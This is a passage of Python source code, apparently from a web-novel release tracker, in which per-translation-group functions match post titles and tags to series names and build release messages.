if item['title'].startswith('A Tale of Two Shadows') or item['title'].startswith("The Legend of Faro: A Tale of Two Shadows Chapter"):
return buildReleaseMessage(item, 'A Tale of Two Shadows', vol, chp, frag=frag)
if item['title'].startswith('Overlord'):
return buildReleaseMessage(item, 'Overlord', vol, chp, frag=frag)
if item['title'].startswith('Hyperion 7'):
return buildReleaseMessage(item, 'Hyperion 7', vol, chp, frag=frag)
if item['title'].startswith('I Want A Harem But She Is Very...'):
return buildReleaseMessage(item, 'I Want A Harem But She Is Very…', vol, chp, frag=frag)
if item['title'].startswith('Gate of Twilight'):
return buildReleaseMessage(item, 'Gate of Twilight', vol, chp, frag=frag)
return False
####################################################################################################################################################
def extractThatGuyOverThere(item):
'''
# That Guy Over There
'''
chp, vol, frag = extractChapterVolFragment(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'wushenkongjian' in item['tags']:
return buildReleaseMessage(item, 'Wu Shen Kong Jian', vol, chp, frag=frag)
match = re.search(r'^Le Festin de Vampire – Chapter (\d+)\-(\d+)', item['title'])
if match:
chp = match.group(1)
frag = match.group(2)
return buildReleaseMessage(item, 'Le Festin de Vampire', vol, chp, frag=frag)
return False
####################################################################################################################################################
def extractOtterspaceTranslation(item):
'''
# Otterspace Translation
'''
chp, vol, frag = extractChapterVolFragment(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Elqueeness' in item['title']:
return buildReleaseMessage(item, 'Spirit King Elqueeness', vol, chp, frag=frag)
if '[Dark Mage]' in item['title'] or '[DarkMage]' in item['title']:
return buildReleaseMessage(item, 'Dark Mage', vol, chp, frag=frag)
if 'Dragon Maken War' in item['title']:
return buildReleaseMessage(item, 'Dragon Maken War', vol, chp, frag=frag)
if 'Legend of Legend' in item['title']:
return buildReleaseMessage(item, 'Legend of Legend', vol, chp, frag=frag)
if "Seoul Station's Necromancer" in item['title'] or "Seoul Station's Necromancer" in item['tags']:
return buildReleaseMessage(item, "Seoul Station's Necromancer", vol, chp, frag=frag)
return False
####################################################################################################################################################
def extractTrippTl(item):
'''
# Tripp Translations
'''
chp, vol, frag = extractChapterVolFragment(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Majin Tenseiki' in item['title']:
return buildReleaseMessage(item, 'Majin Tenseiki', vol, chp, frag=frag)
return False
def extractSaiakuTranslationsBlog(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or "preview" in item['title'].lower():
return None
if item['title'].startswith('She Professed Herself The Pupil Of The Wiseman'):
return buildReleaseMessage(item, 'Kenja no Deshi wo Nanoru Kenja', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractRaisingTheDead(item):
'''
# extractRaisingTheDead
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Isekai meikyuu de dorei harem wo' in item['tags'] \
or 'Slave harem in the labyrinth of the other world' in item['tags'] \
or item['title'].startswith("slave harem"):
return buildReleaseMessage(item, 'Isekai Meikyuu De Dorei Harem wo', vol, chp, frag=frag)
if 'Shinka no Mi' in item['tags'] or 'Shinka' in item['title']:
return buildReleaseMessage(item, 'Shinka no Mi', vol, chp, frag=frag)
if 'Kumo desu ga' in item['tags']:
return buildReleaseMessage(item, 'Kumo Desu Ga, Nani Ka?', vol, chp, frag=frag)
if 'Din No Monshou' in item['tags']:
return buildReleaseMessage(item, 'Din No Monshou', vol, chp, frag=frag)
if 'Elf Tensei' in item['tags']:
return buildReleaseMessage(item, 'Elf Tensei Kara no Cheat Kenkoku-ki', vol, chp, frag=frag)
if 'Smartphone' in item['tags'] or 'Smartphone Chapter' in item['title']:
return buildReleaseMessage(item, 'Isekai wa Smartphone to Tomoni', vol, chp, frag=frag)
if 'Tran Sexual Online' in item['tags'] or \
'Tran Sexual Online' in item['title'] or \
'Trans Sexual Online' in item['title']:
return buildReleaseMessage(item, 'Tran Sexual Online', vol, chp, frag=frag)
if 'Master Of Monsters' in item['title'] or 'Master of Monsters' in item['tags']:
return buildReleaseMessage(item, 'Master Of Monsters', vol, chp, frag=frag)
if 'Takami no Kago' in item['tags'] or 'Takami no Kago' in item['title']:
return buildReleaseMessage(item, 'Takami No Kago', vol, chp, frag=frag)
if 'Alice Tales' in item['tags']:
return buildReleaseMessage(item, 'Alice Tale in Phantasmagoria', vol, chp, frag=frag)
if 'Katte Kita Motoyuusha' in item['tags']:
return buildReleaseMessage(item, 'Katte Kita Motoyuusha', vol, chp, frag=frag)
if 'Riot Grasper' in item['tags']:
return buildReleaseMessage(item, 'Riot Grasper', vol, chp, frag=frag)
if 'E? Heibon Desu Yo??' in item['tags'] \
or 'Eh? Heibon desu yo??' in item['tags']:
return buildReleaseMessage(item, 'E? Heibon Desu Yo??', vol, chp, frag=frag)
if 'Right Grasper' in item['tags']:
return buildReleaseMessage(item, 'Right Grasper ~Stealing Skills in the Other World~', vol, chp, frag=frag)
if 'I, with house work and cooking, takes away the backbone of the Demon lord! The peerless house-husband starts from kidnapping!' in item['tags'] \
or "Demon Lord's Pet" in item['tags']:
return buildReleaseMessage(item, 'I, with house work and cooking, takes away the backbone of the Demon lord! The peerless house-husband starts from kidnapping!', vol, chp, frag=frag)
if 'Game nai ni haitte Doragon o hanto' in item['tags'] \
or item['title'].startswith('(R18) Frequenting Brothels'):
return buildReleaseMessage(item, 'Game nai ni haitte Dragon o Hanto Shinagara Shokan ni Kayoi Tsumeru Hanashi.', vol, chp, frag=frag)
if 'Yuusha Ga Onna Da to Dame Desu Ka?' in item['tags']:
return buildReleaseMessage(item, 'Yuusha Ga Onna Da to Dame Desu Ka?', vol, chp, frag=frag)
if 'Invincible Magician' in item['tags']:
return buildReleaseMessage(item, 'Invincible Magician ~ Akashic Record Overwrite~', vol, chp, frag=frag)
if 'I Said Make My Abilities Average!' in item['tags'] or 'Average Abilities' in item['tags']:
return buildReleaseMessage(item, 'I Said Make My Abilities Average!', vol, chp, frag=frag)
if 'Science Shall Prevail over Magic' in item['tags']:
return buildReleaseMessage(item, 'Science shall Prevail over Magic', vol, chp, frag=frag)
if 'Is Heaven Supposed To Be Like This?!' in item['tags']:
return buildReleaseMessage(item, "Is Heaven Supposed to Be Like This?!", vol, chp, frag=frag, tl_type='oel')
if 'KmF?!' in item['tags']:
matches = re.search(r'When I returned home, what I found was fantasy!\? (\d+)\-(\d+)', item['title'], flags=re.IGNORECASE)
if matches:
vol = float(matches.group(1))
chp = float(matches.group(2))
return buildReleaseMessage(item, 'Kaettekite mo Fantasy!?', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTensaiTranslations(item):
'''
# Tensai Translations
'''
chp, vol, frag = extractChapterVolFragment(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Spirit Migration' in item['tags']:
return buildReleaseMessage(item, 'Spirit Migration', vol, chp, frag=frag)
if 'Tsuyokute New Saga' in item['tags']:
return buildReleaseMessage(item, 'Tsuyokute New Saga', vol, chp, frag=frag)
return False
####################################################################################################################################################
def extractThunder(item):
'''
# Thunder Translations:
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Stellar Transformations' in item['tags'] and (vol or chp):
return buildReleaseMessage(item, 'Stellar Transformations', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTuShuGuan(item):
'''
# 中翻英圖書館 Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'He Jing Kunlun' in item['tags'] and (vol or chp or postfix):
return buildReleaseMessage(item, 'The Crane Startles Kunlun', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractSwordAndGame(item):
'''
# Sword And Game
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Rising of the Shield Hero' in item['tags'] and 'chapter' in [tmp.lower() for tmp in item['tags']]:
return buildReleaseMessage(item, 'The Rise of the Shield Hero', vol, chp, frag=frag, postfix=postfix)
if 'Ark' in item['tags'] and (vol or chp or postfix):
return buildReleaseMessage(item, 'Ark', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractOhanashimi(item):
'''
# Ohanashimi
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if ":" in item['title']:
postfix = item['title'].split(":", 1)[-1]
if 'Seijo no Kaifuku Mahou' in item['tags']:
return buildReleaseMessage(item, 'Seijo no Kaifuku Mahou ga Dou Mitemo Ore no Rekkaban na Ken ni Tsuite', vol, chp, frag=frag, postfix=postfix)
if 'Tate no Yuusha' in item['tags']:
return buildReleaseMessage(item, 'The Rise of the Shield Hero', vol, chp, frag=frag, postfix=postfix)
if 'No Fatigue' in item['tags'] or item['title'].lower().startswith("nf: "):
return buildReleaseMessage(item, 'NO FATIGUE ~24 Jikan Tatakaeru Otoko no Tenseitan~', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractOmegaHarem(item):
'''
# Omega Harem Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol):
return False
if "preview" in item['title']:
return False
title = item['title']
if 'Destruction Flag Noble Girl Villainess' in title or 'Destruction Flag Otome' in title:
return buildReleaseMessage(item, 'Destruction Flag Otome', vol, chp, frag=frag, postfix=postfix)
if 'Demon King Reincarnation' in title:
return buildReleaseMessage(item, 'I, the Demon King, have become a noble girl villainess? Hah, what a joke.', vol, chp, frag=frag, postfix=postfix)
if 'Slave Girl –' in title:
return buildReleaseMessage(item, 'Demotion Trip ~The Magic Girl Swordsman from the Hero’s Party Stumbled into Another World and Became a Slave', vol, chp, frag=frag, postfix=postfix)
if 'Flight of the Dragon, Dance of the Phoenix' in title:
return buildReleaseMessage(item, 'Dragon Flies Phoenix Dances', vol, chp, frag=frag, postfix=postfix)
elif 'Dragon Life' in title:
return buildReleaseMessage(item, 'Dragon Life', vol, chp, frag=frag, postfix=postfix)
elif 'World Teacher' in title:
return buildReleaseMessage(item, 'World Teacher - Isekaishiki Kyouiku Agent', vol, chp, frag=frag, postfix=postfix)
elif 'jashin sidestory' in title.lower() or 'Jashin Average Side Story' in title:
return buildReleaseMessage(item, 'Evil God Average – Side Story', vol, chp, frag=frag, postfix=postfix)
elif 'Heibon' in title:
return buildReleaseMessage(item, 'E? Heibon Desu yo??', vol, chp, frag=frag, postfix=postfix)
elif 'eliza chapter' in title.lower():
if "–" in title and not postfix:
postfix = title.split("–")[-1]
return buildReleaseMessage(item, 'I Reincarnated as a Noble Girl Villainess, but why did it turn out this way', vol, chp, frag=frag, postfix=postfix)
elif 'Villainess Brother Reincarnation' in title:
return buildReleaseMessage(item, 'Villainess Brother Reincarnation', vol, chp, frag=frag, postfix=postfix)
elif 'The Black Knight' in title:
return buildReleaseMessage(item, 'The Black Knight Who Was Stronger than Even the Hero', vol, chp, frag=frag, postfix=postfix)
elif 'GunOta' in item['tags'] and 're-Translations rehost' in item['tags']:
item['srcname'] = "Re:Translations"
return buildReleaseMessage(item, 'Gun-Ota ga Mahou Sekai ni Tensei Shitara, Gendai Heiki de Guntai Harem wo Tsukucchaimashita!?', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractPuttty(item):
'''
# putttytranslations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
# Whoooo, tag case typos!
if any(['god of thunder' == val.lower() for val in item['tags']]) and (vol or chp):
if ":" in item['title']:
postfix = item['title'].split(":", 1)[-1]
return buildReleaseMessage(item, 'God of Thunder', vol, chp, frag=frag, postfix=postfix)
if 'Beseech the devil'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Beseech the Devil', vol, chp, frag=frag, postfix=postfix)
if 'Goblin' in item['tags']:
return buildReleaseMessage(item, 'Goblin', vol, chp, frag=frag, postfix=postfix)
if 'King of the Eternal Night' in item['tags']:
return buildReleaseMessage(item, 'King of the Eternal Night', vol, chp, frag=frag, postfix=postfix)
if 'Martial World' in item['tags']:
return buildReleaseMessage(item, 'Martial World', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractRisingDragons(item):
'''
# Rising Dragons Translation
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'God and Devil World' in item['tags'] and 'Release' in item['tags']:
return buildReleaseMessage(item, 'Shenmo Xitong', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractSylver(item):
'''
# Sylver Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "History's Number One Founder" in item['tags']:
if ":" in item['title']:
postfix = item['title'].split(":", 1)[-1].strip()
return buildReleaseMessage(item, "History's Number One Founder", vol, chp, frag=frag, postfix=postfix)
if 'The Gate of Extinction' in item['tags']:
if ":" in item['title']:
postfix = item['title'].split(":", 1)[-1].strip()
return buildReleaseMessage(item, "The Gate of Extinction", vol, chp, frag=frag, postfix=postfix)
if "Shura's Wrath" in item['tags'] or "Shura\"s Wrath" in item['tags']:
if ":" in item['title']:
postfix = item['title'].split(":", 1)[-1].strip()
return buildReleaseMessage(item, 'Shura\'s Wrath', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTomorolls(item):
'''
# Tomorolls
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Cicada as Dragon' in item['tags'] or 'Semi Datte Tensei Sureba Ryuu Ni Naru' in item['title']:
return buildReleaseMessage(item, 'Cicada as Dragon', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTotokk(item):
'''
# Totokk\'s Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
# Lawl, title typo
if '[SYWZ] Chapter' in item['title'] or '[SWYZ] Chapter' in item['title'] \
or '[SYWZ]' in item['title'] or 'Shen Yin Wang Zuo, Chapter' in item['title']:
return buildReleaseMessage(item, 'Shen Yin Wang Zuo', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTranslationNations(item):
'''
# Translation Nations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Stellar Transformation' in item['tags']:
return buildReleaseMessage(item, 'Stellar Transformations', vol, chp, frag=frag, postfix=postfix)
if 'The Legendary Thief' in item['tags']:
return buildReleaseMessage(item, 'Virtual World - The Legendary Thief', vol, chp, frag=frag, postfix=postfix)
if 'SwallowedStar' in item['tags']:
return buildReleaseMessage(item, 'Swallowed Star', vol, chp, frag=frag, postfix=postfix)
if 'God and Devil World' in item['tags']:
return buildReleaseMessage(item, 'God and Devil World', vol, chp, frag=frag, postfix=postfix)
if 'Limitless Sword God' in item['tags']:
return buildReleaseMessage(item, 'Limitless Sword God', vol, chp, frag=frag, postfix=postfix)
if 'Undefeated God of War' in item['tags']:
return buildReleaseMessage(item, 'Undefeated God of War', vol, chp, frag=frag, postfix=postfix)
if 'Path to Heaven' in item['tags']:
return buildReleaseMessage(item, 'Path to Heaven', vol, chp, frag=frag, postfix=postfix)
if 'The Ultimate Evolution' in item['tags']:
return buildReleaseMessage(item, 'The Ultimate Evolution', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().startswith("the ultimate evolution volume") and "Chapter" in item['title']:
return buildReleaseMessage(item, 'The Ultimate Evolution', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTonyYonKa(item):
'''
# tony-yon-ka.blogspot.com (the blog title is stupidly long)
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Manowa' in item['title'] and chp:
return buildReleaseMessage(item, 'Manowa Mamono Taosu Nouryoku Ubau Watashi Tsuyokunaru', vol, chp, frag=frag, postfix=postfix)
if 'Vampire Princess' in item['title'] and chp:
return buildReleaseMessage(item, 'Kyuuketsu Hime wa Barairo no Yume o Miru', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractRebirthOnlineWorld(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Earth Core' in item['tags']:
return buildReleaseMessage(item, 'Earth\'s Core', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Jikuu Mahou TL' in item['tags']:
return buildReleaseMessage(item, 'Jikuu Mahou de Isekai to Chikyuu wo Ittarikitari', vol, chp, frag=frag, postfix=postfix)
if 'Isekai Shoukan' in item['tags']:
return buildReleaseMessage(item, 'Isekai Shoukan Makikomu Ijousha', vol, chp, frag=frag, postfix=postfix)
if 'Magic Bullet' in item['tags']:
return buildReleaseMessage(item, 'Magic Bullet in Magic Land', vol, chp, frag=frag, postfix=postfix)
if 'Monster Musume' in item['tags']:
return buildReleaseMessage(item, 'Monster Musume Harem o Tsukurou!', vol, chp, frag=frag, postfix=postfix)
if 'Monster Musume' in item['tags']:
return buildReleaseMessage(item, 'Parameter Remote Controller', vol, chp, frag=frag, postfix=postfix)
if 'goddess grant me a girlfriend' in item['tags']:
return buildReleaseMessage(item, 'Goddess Grant me a Girlfriend', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Loiterous' in item['tags']:
return buildReleaseMessage(item, 'Loiterous', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if "tdadp" in item['title'].lower() or 'To deprive a deprived person episode'.lower() in item['title'].lower():
if vol and chp:
vol = None
return buildReleaseMessage(item, 'To Deprive a Deprived Person', vol, chp, frag=frag, postfix=postfix)
if "Lazy Dragon".lower() in item['title'].lower():
return buildReleaseMessage(item, 'Taidana Doragon wa Hatarakimono', vol, chp, frag=frag, postfix=postfix)
if 'Isekai Ryouridou'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Isekai Ryouridou', vol, chp, frag=frag, postfix=postfix)
if "Neta Chara".lower() in item['title'].lower():
return buildReleaseMessage(item, 'Neta Chara', vol, chp, frag=frag, postfix=postfix)
if "Destination of Crybird".lower() in item['title'].lower():
return buildReleaseMessage(item, 'Destination of Crybird', vol, chp, frag=frag, postfix=postfix)
if "Immortal God Emperor".lower() in item['title'].lower():
return buildReleaseMessage(item, 'Immortal God Emperor', vol, chp, frag=frag, postfix=postfix)
if "Zombie master".lower() in item['title'].lower():
return buildReleaseMessage(item, 'Zombie Master', vol, chp, frag=frag, postfix=postfix)
if "Werewolf chapter".lower() in item['title'].lower():
return buildReleaseMessage(item, 'Werewolf chapter', vol, chp, frag=frag, postfix=postfix)
if "Sefiria chap".lower() in item['title'].lower() \
or "Sefi chap".lower() in item['title'].lower() :
return buildReleaseMessage(item, 'Sefiria', vol, chp, frag=frag, postfix=postfix)
if 'Master of Dungeon'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'TMaster of Dungeon', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'TRTS(The Rude Time Stopper)'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'The Rude Time Stopper', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Polymath Redux '.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Polymath Redux', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'The Falcon Immortal'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'The Falcon Immortal', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'The Last Guild'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'The Last Guild: Remastered', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if '[Second Saga] Chapter'.lower() in item['title'].lower() or item['title'].startswith("[SS] "):
return buildReleaseMessage(item, '[Second Saga]', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Inma no Hado chapter'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Inma no Hado', vol, chp, frag=frag, postfix=postfix)
if 'Tensei Shoujo no Rirekisho'.lower() in item['title'].lower():
return buildReleaseMessage(item, 'Tensei Shoujo no Rirekisho', vol, chp, frag=frag, postfix=postfix)
if 'TWVUE' in item['tags']:
return buildReleaseMessage(item, 'Tales of the Wickedly Vicious Underground Empire', vol, chp, frag=frag, postfix=postfix)
if 'Parallel World Mafia' in item['tags']:
return buildReleaseMessage(item, 'In A Parallel World With Random Skills, I Reluctantly Become A Mafia Boss?', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'PRC' in item['tags']:
return buildReleaseMessage(item, 'Parameter Remote Control', vol, chp, frag=frag, postfix=postfix)
if 'TOWN' in item['tags']:
return buildReleaseMessage(item, 'The Ability to make town!? ~Let’s make a Japanese Town in Different world~', vol, chp, frag=frag, postfix=postfix)
if 'Ex-hero' in item['tags']:
return buildReleaseMessage(item, 'Ex-Hero Candidate’s, who turned out to be a cheat from lv2, laid-back life in Another World', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractRuzeTranslations(item):
'''
# Ruze Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Guang Zhi Zi' in item['title'] and (chp or vol):
return buildReleaseMessage(item, 'Guang Zhi Zi', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTsuigeki(item):
'''
# Tsuigeki Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Seiju no Kuni no Kinju Tsukai' in item['tags'] and (chp or vol):
return buildReleaseMessage(item, 'Seiju no Kuni no Kinju Tsukai', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractUnchainedTranslation(item):
'''
# Unchained Translation
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Alchemist God' in item['tags'] and (chp or vol):
return buildReleaseMessage(item, 'Ascension of the Alchemist God', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractShikkakuTranslations(item):
'''
# Shikkaku Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if "kuro no maou" in item['title'].lower():
return buildReleaseMessage(item, 'Kuro no Maou', vol, chp, frag=frag, postfix=postfix)
if 'KENS' in item['tags']:
return buildReleaseMessage(item, 'Kamigoroshi no Eiyuu to Nanatsu no Seiyaku', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractRhinabolla(item):
'''
# Rhinabolla
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Hachi-nan Chapter' in item['title'] and not 'draft' in item['title'].lower():
return buildReleaseMessage(item, 'Hachinan tte, Sore wa nai Deshou!', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractSotranslations(item):
'''
# Supreme Origin Translations
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'hachi-nan chapter' in item['title'].lower() and not 'draft' in item['title'].lower():
return buildReleaseMessage(item, 'Hachinan tte, Sore wa nai Deshou!', vol, chp, frag=frag, postfix=postfix)
if 'the devil of an angel chapter' in item['title'].lower() and not 'draft' in item['title'].lower():
return buildReleaseMessage(item, 'The Devil of an Angel Chapter', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractTurb0(item):
'''
# Turb0 Translation
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
extr = re.search(r' ([A-Z])\d+', item['title'], flags=re.IGNORECASE)
if extr:
if vol and not chp:
chp, vol = vol, chp
ep_key = extr.group(1)
if ep_key == "S":
postfix = "Shun chapter"
elif ep_key == "J" or ep_key == "Y":
postfix = "Julius chapter"
elif ep_key == "K":
postfix = "Katia chapter"
elif ep_key == "B":
postfix = "Balto chapter"
if re.search(r'blood \d+', item['title'], flags=re.IGNORECASE):
postfix = "Blood Chapter"
if 'kumo desu ga, nani ka?' in item['title'].lower() \
or 'kumo desu ka, nani ga?' in item['title'].lower() \
or 'kumo desu ga, nani ga?' in item['title'].lower():
return buildReleaseMessage(item, 'Kumo Desu ga, Nani ka?', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
def extractShiroyukineko(item):
'''
# 'Shiroyukineko Translations'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'DOP' in item['tags'] or 'Descent of the Phoenix: 13 Year Old Princess Consort' in item['tags'] or item['title'].startswith('DOP Chapter'):
return buildReleaseMessage(item, 'Descent of the Phoenix: 13 Year Old Princess Consort', vol, chp, frag=frag, postfix=postfix)
if 'LLS' in item['tags'] or 'Long Live Summons!' in item['tags']:
return buildReleaseMessage(item, 'Long Live Summons!', vol, chp, frag=frag, postfix=postfix)
if 'VW:UUTS' in item['tags'] or 'Virtual World: Unparalled Under The Sky' in item['tags']:
return buildReleaseMessage(item, 'Virtual World: Unparalleled under the Sky', vol, chp, frag=frag, postfix=postfix)
if 'Ze Tian Ji' in item['tags'] or 'ZTJ Chapter' in item['title']:
return buildReleaseMessage(item, 'Ze Tian Ji', vol, chp, frag=frag, postfix=postfix)
if 'The Strongest Dan God' in item['tags']:
return buildReleaseMessage(item, 'The Strongest Dan God', vol, chp, frag=frag, postfix=postfix)
if 'Scriptures of the Great Emperor' in item['tags']:
return buildReleaseMessage(item, 'Scriptures of the Great Emperor', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
# '桜翻訳! | Light novel translations'
####################################################################################################################################################
def extractSakurahonyaku(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if 'hyouketsu kyoukai no eden' in item['tags']:
return buildReleaseMessage(item, 'Hyouketsu Kyoukai no Eden', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRancer(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'The Strongest Magical Beast' in item['tags'] and 'Chapter Release' in item['tags'] and (chp or vol):
return buildReleaseMessage(item, 'The Strongest Magical Beast', vol, chp, frag=frag, postfix=postfix, tl_type='oel')
if 'Apocalypse ЯR' in item['tags'] and 'Chapter Release' in item['tags'] and (chp or vol):
return buildReleaseMessage(item, 'Apocalypse ЯR', vol, chp, frag=frag, postfix=postfix)
if 'Legend of Xing Feng' in item['tags']:
return buildReleaseMessage(item, 'Legend of Xingfeng', vol, chp, frag=frag, postfix=postfix)
if 'The Exceptional Godly Thief-The Good for Nothing Seventh Young Lady' in item['tags']:
return buildReleaseMessage(item, 'The Good for Nothing Seventh Young Lady', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractRadiantTranslations(item):
'''
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return False
if 'Heavenly Calamity' in item['tags']:
return buildReleaseMessage(item, 'Heavenly Calamity', vol, chp, frag=frag, postfix=postfix)
if 'Magic Chef of Ice and Fire' in item['tags']:
return buildReleaseMessage(item, 'Magic Chef of Ice and Fire', vol, chp, frag=frag, postfix=postfix)
if 'The Legend of the Dragon King' in item['tags']:
return buildReleaseMessage(item, 'The Legend of the Dragon King', vol, chp, frag=frag, postfix=postfix)
if 'Zither Emperor' in item['tags']:
return buildReleaseMessage(item, 'Zither Emperor', vol, chp, frag=frag, postfix=postfix)
if 'Radiant Era' in item['tags']:
return buildReleaseMessage(item, 'Radiant Era', vol, chp, frag=frag, postfix=postfix)
if 'Lord Xue Ying' in item['tags']:
return buildReleaseMessage(item, 'Xue Ying Ling Zhu', vol, chp, frag=frag, postfix=postfix)
if 'Chapter Release' in item['tags']:
if 'Child of Light' in item['tags'] or 'Guang Zhi Zi' in item['tags']:
return buildReleaseMessage(item, 'Guang Zhi Zi', vol, chp, frag=frag, postfix=postfix)
if 'Bing Huo Mo Chu' in item['tags'] or 'Magic Chef of Ice and Fire' in item['tags']:
return buildReleaseMessage(item, 'Bing Huo Mo Chu', vol, chp, frag=frag, postfix=postfix)
if 'The Legend of the Dragon King' in item['tags']:
return buildReleaseMessage(item, 'Xue Ying Ling Zhu', vol, chp, frag=frag, postfix=postfix)
if 'Tempest of the Stellar War' in item['tags']:
return buildReleaseMessage(item, 'Tempest of the Stellar War', vol, chp, frag=frag, postfix=postfix)
if ('dragon marked war god' in item['title'].lower().replace("-", " ") or
'dmwg' in item['title'].lower() or
'Dragon Marked War God' in item['tags']):
return buildReleaseMessage(item, 'Dragon-Marked War God', vol, chp, frag=frag, postfix=postfix)
if 'beseech the devil' in item['title'].lower():
return buildReleaseMessage(item, 'Beseech the Devil', vol, chp, frag=frag, postfix=postfix)
return False
####################################################################################################################################################
#
####################################################################################################################################################
def extractTalesOfMU(item):
'''
'''
